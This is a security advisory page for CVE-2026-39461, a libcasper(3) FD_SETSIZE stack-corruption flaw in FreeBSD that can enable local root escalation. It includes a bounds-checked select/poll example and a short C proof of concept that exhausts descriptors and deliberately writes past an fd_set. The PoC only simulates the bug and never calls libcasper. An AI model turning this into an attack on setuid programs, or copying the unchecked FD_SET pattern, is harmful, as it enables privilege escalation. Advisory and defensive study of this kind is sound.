Security Vulnerability Report
CVE-2026-39461 CVSS 8.8 HIGH

CVE-2026-39461

Published: 2026-05-21 10:16:25
Last Modified: 2026-05-21 19:01:36

Description

libcasper(3) communicates with helper processes via UNIX domain sockets, and uses the select(2) system call to wait for data to become available. However, it does not verify that its socket descriptor fits within select(2)'s descriptor set size limit of FD_SETSIZE (1024). An attacker able to cause an application using libcasper(3) to allocate large file descriptors, e.g., by opening many descriptors and executing a program which is not careful to close them upon startup, may trigger stack corruption. If the target application runs with setuid root privileges, this could be used to escalate local privileges.
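The bounds check described above as missing, shown as an added example (this is not libcasper's code or the FreeBSD fix): `wait_readable_select` rejects any descriptor that does not fit in an `fd_set`, and `wait_readable_poll` avoids the limit by using poll(2). All function names here are hypothetical, and the pipe used as input is constructed.

```c
#include <errno.h>
#include <fcntl.h>
#include <poll.h>
#include <stdio.h>
#include <sys/select.h>
#include <unistd.h>

/* Hypothetical helper (not libcasper code): select(2) wait that rejects
 * descriptors an fd_set cannot hold. 1 = readable, 0 = timeout, -1 = error. */
int wait_readable_select(int fd, int timeout_ms) {
    fd_set rfds;
    struct timeval tv = { .tv_sec = timeout_ms / 1000, .tv_usec = timeout_ms % 1000 * 1000 };
    /* Without this check FD_SET() writes outside rfds when fd >= FD_SETSIZE. */
    if (fd < 0 || fd >= FD_SETSIZE) { errno = EINVAL; return -1; }
    FD_ZERO(&rfds);
    FD_SET(fd, &rfds);
    int n = select(fd + 1, &rfds, NULL, NULL, &tv);
    return n < 0 ? -1 : (n > 0 && FD_ISSET(fd, &rfds));
}

/* poll(2) wait: descriptors are passed in an array, so no FD_SETSIZE ceiling. */
int wait_readable_poll(int fd, int timeout_ms) {
    struct pollfd pfd = { .fd = fd, .events = POLLIN };
    if (fd < 0) { errno = EBADF; return -1; }
    int n = poll(&pfd, 1, timeout_ms);
    if (n > 0 && (pfd.revents & POLLNVAL)) { errno = EBADF; return -1; }
    return n < 0 ? -1 : n > 0;
}

/* Constructed input: a pipe holding one byte, read end duplicated to a
 * descriptor >= min_fd. Returns waitfn's result, or -2 when RLIMIT_NOFILE
 * does not allow a descriptor that large. */
int probe(int (*waitfn)(int, int), int min_fd) {
    int p[2], rc = -2;
    if (pipe(p) != 0) return -2;
    int fd = fcntl(p[0], F_DUPFD, min_fd);
    if (fd >= 0 && write(p[1], "x", 1) == 1) rc = waitfn(fd, 0);
    if (fd >= 0) close(fd);
    close(p[0]); close(p[1]);
    return rc;
}

int main(void) {
    printf("select low=%d high=%d, poll high=%d\n", probe(wait_readable_select, 0),
           probe(wait_readable_select, FD_SETSIZE), probe(wait_readable_poll, FD_SETSIZE));
    return 0;
}
```

Where the descriptor limit allows descriptors at or above FD_SETSIZE, the select wrapper fails with EINVAL for the high descriptor while the poll wrapper reports it readable.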

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:freebsd:freebsd:14.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:freebsd:freebsd:14.3:p12:*:*:*:*:*:* - VULNERABLE
FreeBSD (versions using libcasper; see FreeBSD-SA-26:22)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-39461: libcasper FD_SETSIZE Stack Corruption
 * This code demonstrates the condition required to trigger the vulnerability:
 * exhausting file descriptors to force an FD >= 1024.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/select.h>
#include <fcntl.h>
#include <errno.h>

#define LIMIT 1024

int main(void) {
    fd_set read_set;
    int i;
    int pipes[LIMIT][2];

    printf("[*] Attempting to exhaust file descriptors up to %d...\n", LIMIT);

    // Step 1: Open many file descriptors to push the counter
    for (i = 0; i < LIMIT; i++) {
        if (pipe(pipes[i]) == -1) {
            if (errno == EMFILE) {
                printf("[!] Reached file descriptor limit at %d.\n", i);
            } else {
                perror("pipe");
            }
            break;
        }
    }

    // Step 2: Hypothetical vulnerable scenario
    // Assume a new socket is created here by libcasper, getting fd >= 1024
    int vulnerable_fd = LIMIT;
    printf("[*] Simulating vulnerable FD_SET on fd %d...\n", vulnerable_fd);

    FD_ZERO(&read_set);
    // VULNERABILITY: libcasper does not check if vulnerable_fd < FD_SETSIZE
    // This writes out of bounds on the stack
    FD_SET(vulnerable_fd, &read_set);

    printf("[+] If this were a setuid process using libcasper, stack corruption occurred.\n");

    // Cleanup
    for (int j = 0; j < i; j++) {
        close(pipes[j][0]);
        close(pipes[j][1]);
    }
    return 0;
}
